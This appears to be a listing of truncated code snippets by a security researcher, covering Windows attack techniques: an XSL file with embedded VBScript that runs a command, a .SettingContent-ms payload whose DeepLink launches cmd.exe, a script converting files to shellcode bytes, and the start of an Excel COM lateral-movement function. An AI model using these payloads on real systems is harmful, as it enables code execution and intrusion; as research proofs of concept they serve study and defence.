enigma0x3

Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	
	[StructLayout(LayoutKind.Sequential)]
	public struct PROCESS_INFORMATION
	{
		public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId;
	}

enigma0x3

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="urn:my-scripts">

<msxsl:script language="VBScript" implements-prefix="user">
function myFunction()
set shell=createobject("wscript.shell")
shell.run "calc.exe",0
myFunction = 0

enigma0x3

Add-Type -TypeDefinition @"
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	
	[StructLayout(LayoutKind.Sequential)]
	public struct PROCESS_INFORMATION
	{
		public IntPtr hProcess; public IntPtr hThread; public uint dwProcessId; public uint dwThreadId;
	}

enigma0x3

$rpc = ls C:\Windows\System32\*.exe, C:\Windows\System32\*.dll |Get-RpcServer -DbgHelpPath "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\dbghelp.dll"

 foreach ($rpc1 in $rpc)
{
    $ourObject = New-Object -TypeName psobject 
    $ourObject | Add-Member -MemberType NoteProperty -Name InterfaceID -Value $rpc1.InterfaceID
    $ourObject | Add-Member -MemberType NoteProperty -Name FileName -Value $rpc1.Name
    $ourObject | Add-Member -MemberType NoteProperty -Name IsRunning -Value $rpc1.IsServiceRunning
    $ourObject | Add-Member -MemberType NoteProperty -Name EndpointCount -Value $rpc1.EndpointCount
    $procs = $rpc1.Procedures.Name  | Out-String

enigma0x3

function Get-NonstandardService {
<#
.SYNOPSIS

Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.

Author: Will Schroeder (@harmj0y)  
License: BSD 3-Clause  
Required Dependencies: None  

enigma0x3

--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 368 at 0x5306908L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 472 at 0x5306e48L>
64

Interfaces :
Endpoints :

enigma0x3

import binascii
import sys

file_name = sys.argv[1]
with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
		shellcode += "0x{},".format(i)

enigma0x3

--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 520 at 0x5db0c50L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 776 at 0x5db0908L>
64

Interfaces :
Endpoints :

enigma0x3

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>

enigma0x3

function Invoke-ExcelMacroPivot{
<#
    .AUTHOR
       Matt Nelson (@enigma0x3)
    .SYNOPSIS
       Pivots to a remote host by using an Excel macro and Excel's COM object
    .PARAMETER Target
        Remote host to pivot to
    .PARAMETER RemoteDocumentPath
        Local path on the remote host where the payload resides